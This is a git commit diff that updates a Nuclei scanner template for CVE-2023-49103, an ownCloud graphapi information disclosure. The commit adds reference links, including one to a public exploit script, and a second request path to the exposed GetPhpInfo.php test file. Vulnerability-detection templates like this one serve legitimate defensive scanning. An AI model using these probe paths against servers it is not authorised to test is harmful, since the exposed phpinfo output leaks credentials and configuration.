Merge pull request #8724 from projectdiscovery/pussycat0x-patch-5

Endpoint Update CVE-2023-49103
2023-11-30 17:19:28 +05:30 · 2023-11-30 17:19:28 +05:30 · f8b1e66e22
parent ee271cf0eb a7457007c6
commit f8b1e66e22
1 changed files with 5 additions and 2 deletions
--- a/http/cves/2023/CVE-2023-49103.yaml
+++ b/http/cves/2023/CVE-2023-49103.yaml
@ -10,7 +10,8 @@ info:
    - https://github.com/creacitysec/CVE-2023-49103/blob/main/exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49103
    - https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/
-    - https://owncloud.org/security
+    - https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/
+    - https://attackerkb.com/topics/G9urDj4Cg2/cve-2023-49103
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
@ -28,7 +29,9 @@ http:
  - method: GET
    path:
      - "{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
+      - "{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"

+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
@ -42,4 +45,4 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022024ba380f1b5d55bcf03c740791a5a1c970c15e4fdd9586f5034027c0b52b060c022100e8e1f2fb75d78a2fb6cff0566fce705439303b31b8ff45f5033bd6cda46cc463:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022024ba380f1b5d55bcf03c740791a5a1c970c15e4fdd9586f5034027c0b52b060c022100e8e1f2fb75d78a2fb6cff0566fce705439303b31b8ff45f5033bd6cda46cc463:922c64590222798bb761d5b6d8e72950